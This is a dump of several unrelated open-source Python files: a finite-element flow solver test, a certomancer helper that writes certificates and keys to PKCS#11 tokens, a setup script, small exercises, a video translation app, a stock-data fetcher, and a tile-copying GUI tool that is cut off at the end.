plotHelp(points[lin_set],N,1)\n contourPlotter(vel_mag,tri1,title = \"Velocity magnitude\",fname = \"vel_\"+str(i))\n contourPlotter(press,tri2,title = \"Pressure\",fname = \"press_\"+str(i))\n plt.close('all')\n i += 1\n\n\n J1 = [mu[0]+1,2*mu[2] +1]\n J2 = [1,2*mu[2] +1]\n J3 = [mu[1]+1,2*mu[2] +1]\n J4 = [mu[0]+1,1]\n J5 = [mu[1]+1,1]\n J6 = J1\n J7 = J2\n J8 = J3\n\n Js = [J1,J2,J3,J4,J5,J6,J7,J8]\n q1,q2,q3,q4 = [],[],[],[]\n\n for J in Js:\n q1.append(J[1]/J[0])\n q2.append(J[0]/J[1])\n q3.append(J[1])\n q4.append(J[0])\n\n\n #cond1 = points[:,0] < .45\n # cond2 = points[:,0] > .55\n # cond3 = points[:,1] > .15\n #cond4 = points[:,1] < .05\n #points[cond1,0] = mu3*(points[cond1,0]-.45) + points[cond1,0]\n #points[cond2,0] = mu4*(points[cond2,0]-.55) + points[cond2,0]\n #points[cond3,1] = mu5*2*(points[cond3,1]-.15) + points[cond3,1]\n #points[cond4,1] = mu5*2*(points[cond4,1]-.05) + points[cond4,1]\n\n if __name__ != \"__main__\":\n #variabler, mu1 er amplitude på hastighetsprofil, mu2 er dynamsik viskositet\n mu1 = 150\n mu2 = 10\n mu3 = 0\n mu4 = 0\n mu5 = 2\n\n #definerer basisfunksjoner\n phi = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y + c[i][3]*x*y + c[i][4]*(x**2) + c[i][5]*(y**2) + c[i][6]*(x**2)*y + c[i][7]*x*(y**2) +c[i][8]*(x**2)*(y**2)\n phi_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y + 2*c[i][4]*x + 2*c[i][6]*x*y + c[i][7]*(y**2) + 2*c[i][8]*x*(y**2)\n phi_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x + 2*c[i][5]*y + c[i][6]*(x**2) + 2*c[i][7]*x*y+ 2*c[i][8]*(x**2)*y\n\n zeta = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y +c[i][3]*x*y\n zeta_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y\n zeta_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x\n\n a_bilin = lambda x,y,c,i,j: (1/mu1)*(phi_dx(x,y,c,j)*phi_dx(x,y,c,i) + phi_dy(x,y,c,j)*phi_dy(x,y,c,i))\n b_bilin_x = lambda x,y,c1,c2,i,j: -phi_dx(x,y,c2,j)*zeta(x,y,c1,i)\n b_bilin_y = lambda x,y,c1,c2,i,j: -phi_dy(x,y,c2,j)*zeta(x,y,c1,i)\n\n #generer noder, elementer, kanter og indre noder\n N = 4\n #type domene: 0, 1, 2, 3, 4, 5\n typ = 5\n points,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n\n for el in elements:\n print(points[el[1][4]])\n\n o1 = [0,.45]\n o2 = [.55,1]\n o3 = [.45,.55,.05,.15]\n #o1 = [0,.4]\n #o2 = [.4,.6]\n #o3 = [.6,1]\n\n cond1 = points[:,0] < o1[1]\n cond2 = points[:,0] > o2[0]\n cond3 = points[:,1] > o3[3]\n cond4 = points[:,1] < o3[2]\n\n points[cond1,0] = mu3*(points[cond1,0]-.45) + points[cond1,0]\n points[cond2,0] = mu4*(points[cond2,0]-.55) + points[cond2,0]\n points[cond3,1] = mu5*2*(points[cond3,1]-.15) + points[cond3,1]\n points[cond4,1] = mu5*2*(points[cond4,1]-.05) + points[cond4,1]\n\n #domain 0\n #cond1 = np.logical_and(points[:,0] >= o1[0],points[:,0] < o1[1])\n #cond2 = np.logical_and(points[:,0] >= o2[0],points[:,0] < o2[1])\n #cond3 = np.logical_and(points[:,0] >= o3[0],points[:,0] <= o3[1])\n\n #domain 0\n #points[cond1,1] = mu3*(points[cond1,1]-.1) + points[cond1,1]\n #points[cond2,1] = mu3*5*(o2[1]-points[cond2,0])*(points[cond2,1]-.1) + mu4*5*(points[cond2,0]-o2[0])*(points[cond2,1]-.1) + points[cond2,1]\n #points[cond3,1] = mu4*(points[cond3,1]-.1) + points[cond3,1]\n\n #bygger stivhets- og divergensmatrisene\n A = createA(a_bilin,points,elements)\n Dx = createD(b_bilin_x,points,elements)\n Dy = createD(b_bilin_y,points,elements)\n\n #definerer lifting-funksjonen\n y_n = points[non_homog][:,1]\n\n rg = mu2*((y_n+mu5*.1)*((mu5*.2)+.2-(y_n+mu5*.1)))/(0.2*mu5)\n\n #fjerner nødvendige rader og kollonner\n Ai = matrixShaver(A,inner,inner)\n Dxi = matrixShaver(Dx,lin_set,inner)\n Dyi = matrixShaver(Dy,lin_set,inner)\n Gx = matrixShaver(Dx,lin_set,non_homog)\n G = matrixShaver(A,inner,non_homog)\n\n #lager høyresiden\n fx = -G@rg\n fy = np.zeros_like(fx)\n fp = -Gx@rg\n rhs = np.concatenate((fx,fy,fp))\n\n #bygger blokkmatrisa og løser\n Block = sp.bmat([[Ai,None,Dxi.T],[None,Ai,Dyi.T],[Dxi,Dyi,None]]).tocsr()\n u_bar = solver(Block,rhs)\n ux,uy,p = solHelper(u_bar,rg,inner,points,non_homog)\n\n print(\"total out volumeflow\")\n if typ == 2:\n print(sum(np.sqrt(ux[neu]**2 + uy[neu]**2))/len(neu)*(.2+.2*mu5))\n else:\n print(sum(np.sqrt(ux[neu]**2+uy[neu]**2))/len(neu)*(.2+.2*mu5))\n print(\"total in volumeflow\")\n print(sum(np.sqrt(ux[non_homog]**2 + uy[non_homog]**2))/len(non_homog)*(.2+.2*mu5))\n\n #generer triangulering og maskerer for enklere plotting \n tri1 = plotHelp(points,N,mu4+mu5)\n tri2 = plotHelp(points[lin_set],N-1,mu4+mu5)\n \n\n #figur 0, domene\n plt.figure()\n plotElements(points,elements)\n plt.title('Domain w/bilinear and biquadratic elements')\n plt.axis('scaled')\n plt.savefig(\"figur0_type\"+str(typ), dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n #figur1, hastighetsfelt og trykk\n contourPlotter(p,tri2,title = \"Velocity and pressure\",save = False)\n quiverPlotter(ux[lin_set],uy[lin_set],points[lin_set],fname=\"figur1_type\"+str(typ), newfig = False)\n #figur2, x-hastighet\n contourPlotter(ux,tri1,title=\"x-velocity, $u_x$\",fname=\"figur2_type\"+str(typ))\n #figur3, y-hastighet\n contourPlotter(uy,tri1,title=\"y-velocity, $u_y$\",fname=\"figur3_type\"+str(typ))\n #figur4, hastighetsmagnitude\n contourPlotter(np.sqrt(ux**2 + uy**2),tri1,title=\"Velocity-magnitude, $|u|$\",fname=\"figur4_type\"+str(typ))\n #figur5, hastighetsfelt\n quiverPlotter(ux,uy,points,fname=\"figur5_type\"+str(typ),title= \"Velocity-field\")\n #figur6, trykk\n contourPlotter(p,tri2,title=\"Pressure, p\",fname=\"figur6_type\"+str(typ))\n\n plt.close('all')\n'''\n\na = np.asarray([i for i in range(100)])\nb = [3,5,7,10,12,16]\nmask = np.ones(len(a), np.bool)\nmask[b] = 0\na_new = a[mask]\n\ntest = np.asarray([[0,-1],[1,0]])\n\npoint = np.asarray([[3,10],[3,10],[3,10],[3,10],[3,10]])\n\nfor i in range(len(point)):\n point[i] = test@point[i]\n\nprint(point)\n\n\nprint(a[b])\nprint(a_new)\n","repo_name":"Hansi77/Master","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":37494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14806834784","text":"from typing import Any, Dict, List, Optional, Set, Tuple\n\nimport pkcs11\nfrom asn1crypto import core, keys, x509\nfrom pkcs11.util import biginteger, dsa, rsa\nfrom pkcs11.util import x509 as p11_x509\n\nfrom certomancer import PKIArchitecture\nfrom certomancer.registry import CertLabel\n\n__all__ = [\n 'Alchemist',\n 'AlchemistBackend',\n 'DefaultAlchemistBackend',\n 'open_pkcs11_session',\n]\n\n\nclass AlchemistBackend:\n \"\"\"\n Alchemist backend to interface with a hardware token.\n \"\"\"\n\n def private_key_to_token(\n self,\n key: keys.PrivateKeyInfo,\n label: str,\n id_attr: bytes,\n attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n ):\n \"\"\"\n Save a private key on the token.\n\n :param key:\n Private key to save.\n :param label:\n PKCS#11 label to set.\n :param id_attr:\n PKCS#11 ID attribute to set.\n :param attrs:\n Additional PKCS#11 attributes.\n \"\"\"\n raise NotImplementedError\n\n def cert_to_token(\n self,\n cert: x509.Certificate,\n label: str,\n id_attr: bytes,\n attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n ):\n \"\"\"\n Save a certificate on the token.\n\n :param cert:\n Certificate to save.\n :param label:\n PKCS#11 label to set.\n :param id_attr:\n PKCS#11 ID attribute to set.\n :param attrs:\n Additional PKCS#11 attributes.\n \"\"\"\n raise NotImplementedError\n\n\ndef open_pkcs11_session(\n lib_location: str,\n slot_no: Optional[int] = None,\n token_label: Optional[str] = None,\n pin: Optional[str] = None,\n as_so: bool = False,\n rw: bool = True,\n) -> pkcs11.Session:\n \"\"\"\n Open a PKCS#11 session\n\n :param lib_location:\n Path to the PKCS#11 module.\n :param slot_no:\n Slot number to use. If not specified, the first slot containing a token\n labelled ``token_label`` will be used.\n :param token_label:\n Label of the token to use. If ``None``, there is no constraint.\n :param pin:\n User PIN to use.\n :param as_so:\n Pass PIN as SO pin instead of user pin.\n :param rw:\n Open the token in read-write mode (defaults to ``True``).\n :return:\n An open PKCS#11 session object.\n \"\"\"\n lib = pkcs11.lib(lib_location)\n\n slots = lib.get_slots()\n token = None\n if slot_no is None:\n for slot in slots:\n try:\n token = slot.get_token()\n if token_label is None or token.label == token_label:\n break\n except pkcs11.PKCS11Error:\n continue\n if token is None:\n raise pkcs11.PKCS11Error(\n f'No token with label {token_label} found'\n if token_label is not None\n else 'No token found'\n )\n else:\n token = slots[slot_no].get_token()\n if token_label is not None and token.label != token_label:\n raise pkcs11.PKCS11Error(\n f'Token in slot {slot_no} is not {token_label}.'\n )\n\n kwargs: Dict[str, Any]\n kwargs = {'rw': rw}\n if pin is not None:\n kwargs['so_pin' if as_so else 'user_pin'] = pin\n\n return token.open(**kwargs)\n\n\nclass DefaultAlchemistBackend(AlchemistBackend):\n def __init__(self, session: pkcs11.Session):\n self._session = session\n\n def private_key_to_token(\n self,\n key: keys.PrivateKeyInfo,\n label: str,\n id_attr: bytes,\n attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n ):\n algo = key.algorithm\n obj_attrs = {}\n if algo == 'rsa':\n key_bytes = bytes(key['private_key'])\n obj_attrs.update(\n rsa.decode_rsa_private_key(key_bytes, pkcs11.MechanismFlag(0))\n )\n elif algo == 'ec':\n ec_key: keys.ECPrivateKey = key['private_key'].parsed\n params = ec_key['parameters']\n if params is core.VOID:\n params = key['private_key_algorithm']['parameters']\n obj_attrs.update(\n {\n pkcs11.Attribute.KEY_TYPE: pkcs11.KeyType.EC,\n pkcs11.Attribute.EC_PARAMS: params.dump(),\n pkcs11.Attribute.VALUE: ec_key['private_key'].contents,\n }\n )\n elif algo == 'dsa':\n obj_attrs = dsa.decode_dsa_domain_parameters(\n key['private_key_algorithm']['parameters'].dump()\n )\n obj_attrs[pkcs11.Attribute.VALUE] = biginteger(\n key['private_key'].parsed.native\n )\n obj_attrs[pkcs11.Attribute.KEY_TYPE] = pkcs11.KeyType.DSA\n elif algo in ('ed25519', 'ed448'):\n # we encode the params using the RFC 8032 curve name convention\n # See 2.3.6 in the PCKS #11 3.0 current mechanisms specification\n params = core.PrintableString(\n 'edwards25519' if algo == 'ed25519' else 'edwards448'\n )\n obj_attrs.update(\n {\n pkcs11.Attribute.KEY_TYPE: pkcs11.KeyType.EC_EDWARDS,\n pkcs11.Attribute.EC_PARAMS: params.dump(),\n pkcs11.Attribute.VALUE: key['private_key'].parsed.native,\n }\n )\n else:\n raise NotImplementedError(f\"Algorithm {algo!r} is not supported\")\n\n obj_attrs[pkcs11.Attribute.SIGN] = True\n obj_attrs[pkcs11.Attribute.TOKEN] = True\n obj_attrs[pkcs11.Attribute.LABEL] = label\n obj_attrs[pkcs11.Attribute.CLASS] = pkcs11.ObjectClass.PRIVATE_KEY\n obj_attrs[pkcs11.Attribute.ID] = id_attr\n obj_attrs[pkcs11.Attribute.EXTRACTABLE] = False\n obj_attrs[pkcs11.Attribute.SENSITIVE] = True\n if attrs:\n obj_attrs.update(attrs)\n self._session.create_object(obj_attrs)\n\n def cert_to_token(\n self,\n cert: x509.Certificate,\n label: str,\n id_attr: bytes,\n attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n ):\n obj_attrs = p11_x509.decode_x509_certificate(cert.dump())\n obj_attrs[pkcs11.Attribute.TOKEN] = True\n obj_attrs[pkcs11.Attribute.LABEL] = label\n obj_attrs[pkcs11.Attribute.ID] = id_attr\n if attrs:\n obj_attrs.update(attrs)\n self._session.create_object(obj_attrs)\n\n\nclass Alchemist:\n \"\"\"\n The Alchemist is a tool to move Certomancer's PKI architectures onto\n PKCS#11 tokens.\n\n :param backend:\n The backend implementation to use.\n :param pki_arch:\n The PKI architecture to interact with.\n \"\"\"\n\n def __init__(self, backend: AlchemistBackend, pki_arch: PKIArchitecture):\n self._backend = backend\n self.pki_arch = pki_arch\n\n def _get_key_bundle_for(\n self, lbl: CertLabel\n ) -> Tuple[str, x509.Certificate, keys.PrivateKeyInfo]:\n arch = self.pki_arch\n spec = arch.get_cert_spec(lbl)\n cert = arch.get_cert(lbl)\n key = self.pki_arch.key_set.get_private_key(spec.subject_key)\n return str(lbl), cert, key\n\n def store_key_bundles(\n self, certs: Set[CertLabel], include_chains: bool = True\n ):\n \"\"\"\n Store key-certificate from a :class:`.PKIArchitecture` pairs on\n a PKCS#11 token.\n\n The PKCS#11 label and ID attributes for both the keys and\n the certificates will be assigned based on the certificate's label\n in the Certomancer config.\n\n Note that private keys with multiple associated certificates will not\n be deduplicated.\n\n :param certs:\n The set of certificate labels for which both the certificates\n and the corresponding private keys should be installed on the token.\n :param include_chains:\n If ``True`` (the default), also save certificates relevant to the\n ``certs``' chain of trust.\n\n .. note::\n The private keys for these certificates will not be saved.\n \"\"\"\n\n extra_cert_lbls: Set[CertLabel]\n if include_chains:\n extra_cert_lbls = {\n iss_lbl\n for lbl in certs\n for iss_lbl in self.pki_arch.get_chain(lbl)\n }\n else:\n extra_cert_lbls = set()\n\n # make sure there's no overlap in writes\n extra_cert_lbls -= certs\n\n # make sure we have all the info we need before doing any writes,\n # so we get the errors out of the way before making any hard-to-reverse\n # changes on the actual token\n bundles: List[Tuple[str, x509.Certificate, keys.PrivateKeyInfo]] = [\n self._get_key_bundle_for(lbl) for lbl in certs\n ]\n extra_certs: List[Tuple[str, x509.Certificate]] = [\n (str(lbl), self.pki_arch.get_cert(lbl)) for lbl in extra_cert_lbls\n ]\n\n for cert_lbl, cert in extra_certs:\n self._backend.cert_to_token(\n cert=cert, label=cert_lbl, id_attr=cert_lbl.encode('utf8')\n )\n\n for bundle_lbl, cert, priv_key in bundles:\n bundle_id = bundle_lbl.encode('utf8')\n self._backend.cert_to_token(\n cert=cert, label=bundle_lbl, id_attr=bundle_id\n )\n # Note: this will duplicate private keys for which\n # more than one certificate has been issued.\n # We don't dedupe by default because some PKCS#11 client\n # implementations make assumptions about labels & ids\n # to pair up keys and certs, but it might be good to\n # support that use case as well (?)\n self._backend.private_key_to_token(\n key=priv_key, label=bundle_lbl, id_attr=bundle_id\n )\n","repo_name":"MatthiasValvekens/certomancer","sub_path":"certomancer/integrations/alchemist.py","file_name":"alchemist.py","file_ext":"py","file_size_in_byte":9871,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"60"} +{"seq_id":"3570828600","text":"from os.path import abspath, dirname, join\nfrom setuptools import setup, find_packages\n\n\nartifactory_repo_name = 'robotfw_core_resources'\n# line below is replaced by script in Jenkins - LEAVE IT\nartifactory_version = 'DEV'\n\nCURDIR = dirname(abspath(__file__))\n\n\ndef get_requirements():\n requirements = []\n with open(join(CURDIR, 'requirements.txt')) as f:\n for line in f.readlines():\n line = line.strip()\n # Remove empty lines and comment lines\n if line and not line.startswith('#'):\n requirements.append(line)\n return requirements\n\ndef get_packages():\n return find_packages(exclude=['doc', 'imgs', 'test'])\n\n\nsetup(\n name=artifactory_repo_name,\n version=artifactory_version,\n dependency_links=['https://artifacts.werally.in/artifactory/api/pypi/pypi-release/simple'],\n maintainer='Core QA',\n maintainer_email='core-qa@rallyhealth.com',\n install_requires=['robotfw_resources', get_requirements()],\n packages=get_packages(),\n package_dir={'': '.'},\n include_package_data=True,\n zip_safe=False,\n description='Accounts Robot Framework Resources',\n url='https://github.com/AudaxHealthInc/Core-AutomatedTests/SharedLibrary',\n)\n","repo_name":"rally-conner/gizmo","sub_path":"shared_library/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22182798804","text":"import time\n\nif __name__==\"__main__\":\n a=[\n [1,2,3,4],\n [5,6,7,8],\n [9,10,11,12]\n ]\n '''create a pivot list where row will be converted to colum \n and columns will be converted to rows, here the o/p will be\n [\n [1,5,9],\n [2,6,10],\n [3,7,11],\n [4,8,12]\n ]'''\n\n #my logic\n '''b= [\n [row[0][0],row[1][0],row[2][0]],\n [row[0][1],row[1][1],row[2][1]],\n [row[0][2],row[1][2],row[2][2]],\n [row[0][3],row[1][3],row[2][3]]\n ]\n for i in range(0,column-1,1)\n for j in range(0,row-1,1)\n row[j][i]\n '''\n\n start_time=time.time()\n b=list()\n for i in range(0, len(a[0]) , 1):\n row=list()\n for j in range(0, len(a) , 1):\n row.append(a[j][i])\n b.append(row)\n print(b)\n total_time=time.time()-start_time\n print(\"total time taken by method1 is->\")\n print(total_time)\n\n #now using comprehension\n start_time=time.time()\n b1=[[a[j][i] for j in range(len(a))] for i in range(len(a[0]))] #first method\n print(b1)\n total_time=time.time()-start_time\n print(\"total time taken by method2 is->\")\n print(total_time)\n\n start_time=time.time()\n b2=[[row[i] for row in a] for i in range(len(a[0]))]#simpler method\n print(b2)\n total_time=time.time()-start_time\n print(\"total time taken by method3 is->\")\n print(total_time)\n\n #From the performance it is clear that the last method is the fastest","repo_name":"Tanusree-Das/python-practice-exercises","sub_path":"code-base/nestedListComprehension.py","file_name":"nestedListComprehension.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21120595657","text":"from PIL import Image\nfrom numpy import average, round\nimport colorsys\nimport time\n\nstart_time = time.clock()\n\n# returns most used color in image\ndef color_comp():\n print(\"File name?\")\n filename = input(\"\")\n\n def color_in_img(img):\n # Convert HSV to degrees/percentages/percentages\n def hue(pixel):\n return round(pixel[0]*360, 1)\n\n def saturation(pixel):\n return round(pixel[1]*100, 1)\n\n def value(pixel):\n return round(pixel[2]/255*100, 1)\n\n # Bounds for colors, ranges decided with:\n # http://www.workwithcolor.com/red-color-hue-range-01.htm\n #def redval(pixel):\n # if hue(pixel) >= 346 or (hue(pixel) >= 0 and hue(pixel) <= 20):\n # return True\n\n #def orangeval(pixel):\n # if hue(pixel) >= 11 and hue(pixel) <= 50:\n # return True\n\n #def yellowval(pixel):\n # if hue(pixel) >= 41 and hue(pixel) <= 80:\n # return True\n\n #def greenval(pixel):\n # if hue(pixel) >= 61 and hue(pixel) <= 169:\n # return True\n\n #def cyanval(pixel):\n # if hue(pixel) >= 141 and hue(pixel) <= 220:\n # return True\n\n #def blueval(pixel):\n # if hue(pixel) >= 201 and hue(pixel) <= 280:\n # return True\n\n def purpleval(pixel):\n if hue(pixel) >= 241 and hue(pixel) <= 330:\n return True\n\n #def pinkval(pixel):\n # if hue(pixel) >= 321 and hue(pixel) <= 355:\n # return True\n\n valuedict = {\"purple\": purpleval}\n\n valuecount = {\"purple\": 0}\n\n try:\n im = Image.open(img, 'r')\n width, height = im.size\n pixel_values = list(im.getdata())\n\n color_data = []\n for pixel in pixel_values:\n color_data.append(colorsys.rgb_to_hsv(*pixel))\n\n for pixel in color_data:\n if saturation(pixel) == 0:\n continue\n if saturation(pixel) == 100 and value(pixel) == 0:\n continue\n for color in valuedict:\n if valuedict[color](pixel):\n valuecount[color] += 1\n\n color_most = max(valuecount, key=valuecount.get)\n return color_most + \" is the most used color, composing \" \\\n + str(int(round(valuecount[color_most]/len(pixel_values)*100))) \\\n + \"% of the image\"\n\n except FileNotFoundError:\n return \"Error: file <\" + filename + \"> not found\"\n\n return color_in_img(filename)\n\n# select ImageColorSort mode\ndef mode_select():\n mode_dict = {\"color comp\": color_comp}\n\n print(\"Select a mode.\")\n for key in mode_dict:\n print(key)\n mode = input(\"\")\n\n try:\n return mode_dict[mode]()\n except KeyError:\n return \"Error: <\" + mode + \"> not a valid mode\"\n\nprint(mode_select())\n\nprint(\"Runtime: \", time.clock() - start_time, \"seconds\")\n","repo_name":"brandonhudavid/ImageColorSort","sub_path":"sourcecode/old/ImageColorSort_v1-purple.py","file_name":"ImageColorSort_v1-purple.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71647207230","text":"import os\r\nimport pathlib\r\nimport streamlit as st\r\nimport tempfile\r\nimport time\r\nfrom interpreter import video_to_video\r\nfrom helper import split_video, merge_video\r\n\r\ndef get_video_download(video_file):\r\n with open(video_file, 'rb') as video:\r\n return video.read()\r\n\r\n\r\ndef translate_video():\r\n video_file = st.file_uploader(\r\n label=\"Select a video file to transcribe and translate\",\r\n type=[\"mp4\", \"avi\", \"mov\"],\r\n accept_multiple_files=False)\r\n\r\n if video_file:\r\n ext = pathlib.Path(video_file.name).suffix\r\n with tempfile.NamedTemporaryFile(suffix=ext) as tmp_file:\r\n tmp_file.write(video_file.read())\r\n \r\n a = time.time()\r\n with tempfile.TemporaryDirectory() as tempdir:\r\n video_file = tmp_file.name\r\n save_dir = f'{tempdir}/vchunks'\r\n chunk_dir = f'{tempdir}/trans_chunks'\r\n _, video_name = split_video(video_file, save_dir)\r\n\r\n\r\n # translate video chunks\r\n for i, vchunk in enumerate(sorted(os.listdir(save_dir))):\r\n start = time.time()\r\n video_to_video(f'{save_dir}/{vchunk}', chunk_dir)\r\n end = time.time() - start\r\n st.write(f'Translated chunk {i+1} in {end}s.')\r\n\r\n # merge translated videos together\r\n translated_video = merge_video(video_name, chunk_dir, prefix='fr')\r\n\r\n time_spent = time.time() - a\r\n\r\n if not translate_video:\r\n st.write(\"We could not process your video, sorry.\")\r\n return\r\n\r\n st.subheader(\"Results\")\r\n st.write(f\"It took {time_spent}s to process your video\")\r\n\r\n st.download_button(\r\n label=\"Here's your translated video\",\r\n data=get_video_download(translated_video),\r\n file_name=translated_video,\r\n # the produced audio is an mp4 file. this should be changed if the\r\n # video mimetype changes\r\n mime=\"video/mp4\",\r\n key=\"video_download_btn\"\r\n )\r\n","repo_name":"NITHUB-AI/TheInterpreter","sub_path":"web/translate_video.py","file_name":"translate_video.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70843897150","text":"from ts_mysql import *\nfrom ts_mysql import data_preparation as dp #数据预处理\nimport pandas as pd\n#tushare上下载的数据为pandas.DataFrame格式\n\npro = ts.pro_api()\n\n#该模块用来获取tushare的数据\n\ndef initial_token(token):\n \"\"\"set your token\"\"\"\n ts.set_token(token)\n\ninitial_token()\n#%% get data from tushare\ndef get_symbolIntushare():\n \"\"\"从tushare上得到基本股票列表及信息\"\"\"\n code = pro.stock_basic()\n return dp.none2str_0(code)\n\ndef get_index_of_certain_market(market=''):\n \"\"\"\n obtain the Index of certain market\n 市场代码 \t说明\n MSCI \tMSCI指数\n CSI \t中证指数\n SSE \t上交所指数\n SZSE \t深交所指数\n CICC \t中金所指数\n SW \t申万指数\n CNI \t国证指数\n OTH \t其他指数\n \"\"\"\n df = pro.index_basic(market = market)\n return dp.none2str_0(df)\n\ndef get_index_allInTushare():\n market_list = ['MSCI','CSI','SSE','SZSE','CICC']\n df = get_index_of_certain_market('OTH')\n for mk in market_list:\n data_temp = get_index_of_certain_market(mk)\n df = pd.concat([df, data_temp], axis=0, join='outer')\n# try:\n# del df['list_date']\n# except Exception as ee:\n# print(ee)\n return dp.none2str_0(df)\n\ndef get_1stock_daily_data(ts_code='',start_date='19900101',end_date=now_):\n \"\"\"\n :param ts_code:str\n :param trade_date\\end_date:str yyyymmdd\n \"\"\"\n# if not end_date:\n# end_date = time.strftime('%Y%m%d')\n# if not start_date:\n# start_date='19990101'\n df = pro.daily(ts_code=ts_code,start_date=start_date,end_date=end_date)\n d = df.drop(['change'],axis=1)#change is mysql key word,cant use\n return d\n\ndef get_1index_daily(ts_code='',start_date='19900101',end_date=now_):\n \"\"\"\n \"\"\"\n df = pro.index_daily(ts_code=ts_code,start_date=start_date,end_date=end_date)\n d = df.drop(['change'],axis=1)#change is mysql key word,cant use\n \n return dp.none2str_0(d)\n\n\ndef get_1stock_daily_dataInTushare(ts_code='',start_date='19900101',end_date=now_):\n \"\"\"\n :param ts_code:str\n :param trade_date\\end_date:str yyyymmdd\n \"\"\"\n# if not end_date:\n# end_date = time.strftime('%Y%m%d')\n# if not start_date:\n# start_date='19990101'\n df = pro.daily(ts_code=ts_code,start_date=start_date,end_date=end_date)\n d = df.drop(['change'],axis=1)\n return d\n\nif __name__ == '__main__':\n print(\"tushare_api module\".center(20,'-'))\n #initial_token() # inidal token to get access\n\n #get daily data of '000001.SZ' from '20180101' to '20181126'\n # df = get_1stock_daily_data(ts_code='000001.SZ',start_date='20180101',end_date='20181126')\n # print(df)\n\n #get all indexes in tushare\n #df = get_index_allInTushare()\n \n #get_1 index daily data\n df = get_1index_daily(ts_code='399300.SZ')\n print(df)\n\n","repo_name":"bladezzw/backtesting_module","sub_path":"ts_mysql/tushare_api.py","file_name":"tushare_api.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6031325795","text":"import sys\nimport shutil\nimport os, glob\nimport subprocess\nimport math\nimport time\nfrom datetime import datetime\nfrom gooey import Gooey, GooeyParser\nfrom geojson import Point, Feature, FeatureCollection, Polygon,dump\nfrom multiprocessing import Pool,freeze_support\nsys.path.append('{0}/lib/atlass/'.format(sys.path[0]).replace('\\\\','/'))\nfrom Atlass_beta1 import *\n\n@Gooey(program_name=\"Tile migrater\", use_legacy_titles=True, required_cols=1, default_size=(1000,820))\ndef param_parser():\n parser=GooeyParser(description=\"Moves/Copies specified tiles to a new folder\")\n parser.add_argument(\"input_folder\", metavar=\"Input Directory \", widget=\"DirChooser\", help=\"Select folder with input files\")\n parser.add_argument(\"output_dir\", metavar=\"Output Directory\", widget=\"DirChooser\", help=\"Output directory\")\n parser.add_argument(\"-file\",metavar=\"Tilelayout File\", widget=\"FileChooser\")\n parser.add_argument(\"filetype\",metavar=\"Input File Type\", help=\"Select input file type\", choices=['las', 'laz','zip','rar','txt','asc','shp','shx','dbf','prj','tab','dat','id','map'], default='laz')\n parser.add_argument(\"-co\", \"--cores\",metavar=\"Cores\", help=\"No of cores to run in\", type=int, default=4)\n parser.add_argument(\"-copy\", metavar=\"Copy Files to output folder\", action='store_true', default=False)\n parser.add_argument(\"-move\", metavar=\"Move Files to output folder\", action='store_true', default=False)\n txtf_group = parser.add_argument_group(\"Use Text file\", gooey_options={'show_border': True,'columns': 3})\n txtf_group.add_argument(\"-usetxtfile\", action=\"store_true\", help=\"Use Txt file as input\")\n txtf_group.add_argument(\"-txtfile\",metavar=\"Input Text file\", widget=\"FileChooser\")\n txtf_group.add_argument(\"-tilesize\",metavar=\"Input file tile size\", default=500, type = int)\n batch_group = parser.add_argument_group(\"create batches\", gooey_options={'show_border': True,'columns': 3})\n batch_group.add_argument(\"-ba\", \"--batches\",metavar=\"Batches\", help=\"No of batches to split to\", type=int, default=1,gooey_options={\n 'validator': {\n 'test': '1 <= int(user_input) <= 250',\n 'message': 'Must be between 1 and 250'\n }})\n block_group = parser.add_argument_group(\"Blocking Settings\", \"Required when breaking a tilelayout into desired block sizes. \\n**Do not use with the 'Batches' setting above\", gooey_options={'show_border': True,'columns': 2})\n block_group.add_argument(\"-gen_block\",metavar=\"Generate Blocks\", help=\"Divide to blocks\",action='store_true', default=False)\n block_group.add_argument(\"-block_size\",metavar=\"Block size\", help=\"Block size\", type = int ,default=10000)\n\n return parser.parse_args()\n\ndef copyfile(input, output):\n log = ''\n try:\n shutil.copyfile(input, output)\n\n except subprocess.CalledProcessError as suberror:\n log=log +'\\n'+ \"{0}\\n\".format(suberror.stdout)\n return (False,None,log)\n\n finally:\n if os.path.isfile(output):\n #print('File {0} moved to {1}'.format(input,output))\n log = \"Copying file for {0} Success\".format(input)\n return (True,output, log)\n\n else: \n log = \"Copying file for {0} Failed\".format(input)\n return (False,output, log)\n\ndef movefiles(input, output):\n log = ''\n try:\n shutil.move(input, output)\n\n except subprocess.CalledProcessError as suberror:\n log=log +'\\n'+ \"{0}\\n\".format(suberror.stdout)\n return (False,None,log)\n\n finally:\n if os.path.isfile(output):\n #print('File {0} moved to {1}'.format(input,output))\n log = \"Moving file {0} Success\".format(input)\n return (True,output, log)\n\n else: \n log = \"Moving file {0} Failed\".format(input)\n return (False,output, log)\n\n\ndef main():\n\n freeze_support()\n\n args = param_parser()\n\n intputfolder = args.input_folder.replace('\\\\','/')\n outputfolder = 